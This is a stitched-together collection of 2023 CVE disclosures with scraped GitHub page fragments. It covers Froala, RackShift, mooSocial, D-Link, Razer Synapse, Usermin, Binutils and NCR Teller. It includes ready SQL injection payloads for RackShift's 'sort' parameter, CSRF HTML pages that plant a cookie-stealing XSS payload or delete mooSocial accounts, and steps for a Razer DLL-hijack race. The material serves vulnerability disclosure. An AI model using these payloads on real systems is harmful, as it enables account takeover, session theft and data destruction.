Froala Editor v4.0.1 to v4.1.1 was discovered to contain a cross-site scripting (XSS) vulnerability.

CVE-2023-41592: OWASP Top Ten | OWASP Foundation

SQL injection vulnerability in FIT2CLOUD RackShift v1.7.1 allows attackers to execute arbitrary code via the `sort` parameter to taskService.list(), bareMetalService.list(), and switchService.list().

**Description**

Multiple SQL injection vulnerabilities in RackShift v1.7.1 allow attacker to execute arbitrary SQL commands via the sort parameter to taskService.list(), bareMetalService.list(), switchService.list() and so on.

**Detail**

Multiple controllers have SQL injection vulnerabilities, and I will use TaskController as an example to provide a detailed explanation. The list() method in TaskController.java accepts user-supplied POST request body parameters, which are then passed to taskService.list() for processing.  
  
The TaskDTO definition includes a "sort" parameter.  
  
Upon further investigation in TaskService.java, it was found that the parameters are ultimately handled by extTaskMapper.list() in ExtTaskMapper.java.  
  
  
Upon further inspection of ExtTaskMapper.xml, it was discovered that when the "sort" parameter is not empty, it is directly concatenated into the SQL query as "order by ${sort}", without any validation or sanitization. This results in a SQL injection vulnerability.  

**Payload**

    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: {"searchKey":"1","sort":"(UPDATEXML(2546,CONCAT(0x2e,0x717a6b7171,(SELECT (ELT(2546=2546,1))),0x7171787871),9622))"}
    
    Type: time-based blind
    Title: MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)
    Payload: {"searchKey":"1","sort":"(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)"}
    

**PoC**

**Suggestion**

Define a whitelist of "sort" parameter values and validate incoming "sort" parameters against the whitelist at the Java code.

CVE-2023-42405: [BUG] SQL injection vulnerability in list() method across multiple controllers · Issue #79 · fit2cloud/rackshift

Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

\# CVE-2023-40869
Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit\_menu, copuon, and group\_categorias functions

XSS STORE via CSRF.

#Paths Affected
http://admin-socialcommerce.moosocial.com/admin/group/group\_categories
http://admin-socialcommerce.moosocial.com/admin/coupon/
http://admin-socialcommerce.moosocial.com/admin/menu/manage/edit\_menu/6

Poc:

1 - Make a file with this HTML and with and include XSS PAYLOAD

<html>
  <body>
    <form action="http://admin-socialcommerce.moosocial.com/admin/group/group\_categories/save" method="POST">
      <input type="hidden" name="data&#91;id&#93;" value="" />
      <input type="hidden" name="data&#91;name&#93;" value="test&quot;&gt;&lt;img&#32;src&#61;a&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;test" />   ##payload in this example and encoded : test"><img src=a onerror=alert(document.cookie)>test
      <input type="hidden" name="data&#91;type&#93;" value="Group" />
      <input type="hidden" name="data&#91;header&#93;" value="0" />
      <input type="hidden" name="data&#91;header&#93;" value="1" />
      <input type="hidden" name="data&#91;parent&#95;id&#93;" value="0" />
      <input type="hidden" name="data&#91;description&#93;" value="" />
      <input type="hidden" name="data&#91;active&#93;" value="0" />
      <input type="hidden" name="data&#91;active&#93;" value="1" />
      <input type="hidden" name="data&#91;everyone&#93;" value="0" />
      <input type="hidden" name="data&#91;everyone&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click the code will inject a payload and will be store at the DataBase

**About**

Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit\_menu, copuon, and group\_categorias functions

**Resources**

Readme

Activity

**Stars**

**0** stars

**Watchers**

**1** watching

**Forks**

**0** forks

CVE-2023-40869: GitHub - MinoTauro2020/CVE-2023-40869: Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_me

Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

\# CVE-2023-40868

 Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.
 
The vulnerability is a Cross-Site Request Forgery (CSRF) vulnerability in the mooSocial MooSocial Software v.Demo application. A CSRF vulnerability occurs when a malicious actor can trick a victim into performing an action that they did not intend to perform. In this case, the malicious actor could trick the victim into clicking on a link or opening a file that contains malicious code. This code could then be used to delete the victim's account or deactivate their account.

POC

 1 - Make an file with with this CODE and SAVE in HTML 
 Attack Delete Account

 <html>
  <body>
    <form action="https://socialcommerce.moosocial.com/users/delete\_account">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>

OR Make an file with this CODE and SAVE in HTML
Attack Deactivate Account

<html>
  <body>
    <form action="https://socialcommerce.moosocial.com/users/deactivate">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click at the button
the code will changes in his actually session.

CVE-2023-40868: GitHub - MinoTauro2020/CVE-2023-40868: Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Dea

D-LINK DIR-859 A1 1.05 and A1 1.06B01 Beta01 was discovered to contain a command injection vulnerability via the lxmldbc_system function at /htdocs/cgibin.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-39638: dlink/dir-859/readme.md at main · mmmmmx1/dlink

Razer Synapse through 3.7.1209.121307 allows privilege escalation due to an unsafe installation path and improper privilege management. Attackers can place DLLs into %PROGRAMDATA%\Razer\Synapse3\Service\bin if they do so before the service is installed and if they deny write access for the SYSTEM user. Although the service will not start if it detects malicious DLLs in this directory, attackers can exploit a race condition and replace a valid DLL (i.e., a copy of a legitimate Razer DLL) with a malicious DLL after the service has already checked the file. As a result, local Windows users can abuse the Razer driver installer to obtain administrative privileges on Windows.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-002 Product: Razer Synapse Manufacturer: Razer Inc. Affected Version(s): Versions before 3.8.0428.042117 (20230601) Tested Version(s): 3.8.0228.022313 (20230315) under Windows 10 Pro (10.0.19044) under Windows 11 Home (10.0.22621) Vulnerability Type: Improper Privilege Management (CWE-269) Time-of-check Time-of-use Race Condition (CWE-367) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2023-03-23 Solution Date: 2023-04-28 Public Disclosure: 2023-08-31 CVE Reference: CVE-2022-47631 Author of Advisory: Dr. Oliver Schwarz, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Razer Synapse is an additional driver software for Razer gaming devices. The manufacturer describes the product as a "unified cloud-based hardware configuration tool" (see \[1\]). Due to an unsafe installation path, improper privilege management, and a time-of-check time-of-use race condition, the associated system service "Razer Synapse Service" is vulnerable to DLL hijacking. As a result, local Windows users can abuse the Razer driver installer to obtain administrative privileges on Windows. In order to exploit the vulnerability, the attacker needs physical access to the machine and needs to prepare the attack before Razer Synapse is installed along with a Razer driver. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The attack scenario considers a Windows machine without any previous installation of any Razer device or software. The attacker has a local unprivileged Windows account, physical access to the machine, and a device which is either a Razer peripheral or able to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero). The attacker aims at executing code with full system privileges. The attack exploits the Razer Synapse Service which runs with elevated privileges. While the main binary of the service is stored in the protected location "C:\\Program Files (x86)\\Razer\\Synapse3\\Service", it dynamically loads libraries from "C:\\ProgramData\\Razer\\Synapse3\\Service\\bin". Before the installation, standard users can write to this path, since "C:\\ProgramData" is world-writable on a standard installation of Windows. The Synapse installation procedure changes access privileges, so that standard users cannot write to the path any longer. However, if the path is created before the driver installation, the creator can set own files to be read-only and deny write access for the SYSTEM user. Upon start, the Synapse service checks the location for foreign DLLs, removes them, and aborts upon failure to delete them. However, due to a time-of-check time-of-use race condition, attackers can replace a benign DLL after it has been checked and before it is loaded. Note that the described vulnerability is similar to CVE-2021-44226 (SYSS-2021-058) and CVE-2022-47632 (SYSS-2022-047), which Razer Inc. fixed in March and September of 2022, respectively. The new attack differs from the earlier ones in that the attacker now has to exploit a race condition. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The attack consists of the following steps: 1. Before the installation of the driver/Synapse, the attacker creates "C:\\ProgramData\\Razer\\Synapse3\\Service\\bin", copies a custom malicious version of userenv.dll into the directory, sets the DLL to read-only, and denies write access for SYSTEM. 2. Afterwards, the attacker triggers the installation of Synapse. This can be done without any elevated privileges by plugging in a Razer device and following the installation procedure for Synapse if device-specific co-installers are not disabled. Alternatively, a device such as Bash Bunny or a Raspberry Pi Zero can be used and pretend to be a Razer device. 3. With the help of a script, the attacker monitors the installation progress. As soon as legitimate DLL files show up in the directory, the attacker temporarily overwrites the malicious DLL with a legitimate one, waits for the DLL to be assessed (i.e., read), and then quickly copies back the malicious content to the DLL before it is actually loaded and executed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Razer has published a patched version that will be deployed automatically upon driver installation on current Windows builds. To prevent similar attacks through other co-installers, system administrators can disable them by setting the following key in the Windows registry: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\DisableCoInstallers = 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-12-19: Vulnerability discovered 2023-03-23: Vulnerability reported to manufacturer 2023-04-28: Patch released by manufacturer 2023-08-31: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Razer Synapse 3 https://www2.razer.com/eu-en/synapse-3 \[2\] SySS Security Advisory SYSS-2023-002 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-002.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy \[4\] SySS Proof of Concept Video https://youtu.be/0myDcqmtt0U ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH. E-Mail: oliver.schwarz@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver\_Schwarz.asc Key ID: 0x9716294F1294280D Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE1FKwFOmSKIbnmWtDlxYpTxKUKA0FAmTsprkACgkQlxYpTxKU KA2+ehAAh0McQFUxuHHBPDlUmhoWLI+iOfTu7sGmJQLmHA5OToLnvCmz1Eqal7C2 B1G3IR8S9wvj5Ah2TFQdCAg0s4+WL+LmvhcxjL2t2Iq8hVd9v/kWFfx4N95YfA3f CveZRfFbMLgPN18pyKN41J5K1JjDj7HEHNYGOD/s5PsevM1tMwgQCz4PB/dAZcVj 0NkiiadD+xpe03H9S4H5DxyY10k1xt4vFNo2KObEfTnBPTNWte8VG7C7NNLSnqhS uQDR4wFrDQ2AT03im8ErN4ymXljohPVOTmIS8mvSrC72r6S0OD395Fm8FBW3qirg Y5y2YQsWbtbMLtGcOB4aRRQhS3QAUkmGG64vd+Wfg7/a/ntjMM9TPzmWDAQbHkLf mZihJlO4VNY8pSrQRx66bfodDffMBm0Jb0ArLL+/EktbpyGsGx18W2CXmYLVj0B7 FOUoHbNRoecSDnrx8PrhiQOgnmVhC0fw5IKoFZSmRLPNFOZQKUWR0T3kpYL83nUT VzGfSY0ZC+d41hWTJwv7Jqf/qKSt274T5GVZklkWEBaR0tabEwwfG2jLZnlxTja+ X2bTVh013HjeltVXeJCMWQrqJrlr52AZNQQYRNBU5EWlkm9itsmHyOsbe0o04yvn cQIjjiwYi1Rao0irOHG+sv5m/FgDpXm+FzcjGhptLAHPU5MC0uc= =TecR -----END PGP SIGNATURE-----

CVE-2022-47631

A Stored Cross-Site Scripting (XSS) vulnerability while editing the autoreply file page in Usermin 2.000 allows remote attackers to inject arbitrary web script or HTML by editing the forward file manually.

CVE-2023-41159: Usermin-2.000/CVE-2023-41159 at main · shindeanik/Usermin-2.000

A Stored Cross-Site Scripting (XSS) vulnerability in the filter and forward mail tab in Usermin 2.001 allows remote attackers to inject arbitrary web script or HTML via the save to new folder named field while creating a new filter.

CVE-2023-41156: Usermin-2.001/CVE-2023-41156 at main · shindeanik/Usermin-2.001

A flaw was found in Binutils. The field `the_bfd` of `asymbol`struct is uninitialized in the `bfd_mach_o_get_synthetic_symtab` function, which may lead to an application crash and local denial of service.

'2167505?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-25588: Invalid Bug ID

An arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file.

**CVE-2023-42362****Author: Abdelrahman Mohamed (Mr-n0b3dy)****Linked-in: https://www.linkedin.com/in/abdelrhman-mohamed-ashraf-7bb43410b/****Vulnerability Name: Unrestricted File Upload that led to ATO****Severity: High****Product: NCR teller web app****Version: 4.4.0****Description:**

The Unrestricted File Upload leading to Stored Cross-Site Scripting (XSS) vulnerability is a security issue identified within the web application. This vulnerability arises due to a lack of proper input validation in the file upload functionality.

**Impact:**

Attackers can upload a malicious file containing JavaScript code that enables them to hijack the admin session, which is already stored in the local storage. This breach could result in an account takeover of the admin account, granting them full access to administrator functionalities.

**Recommendations:**

Install the latest version of the NCR Teller web app.

Source

CVE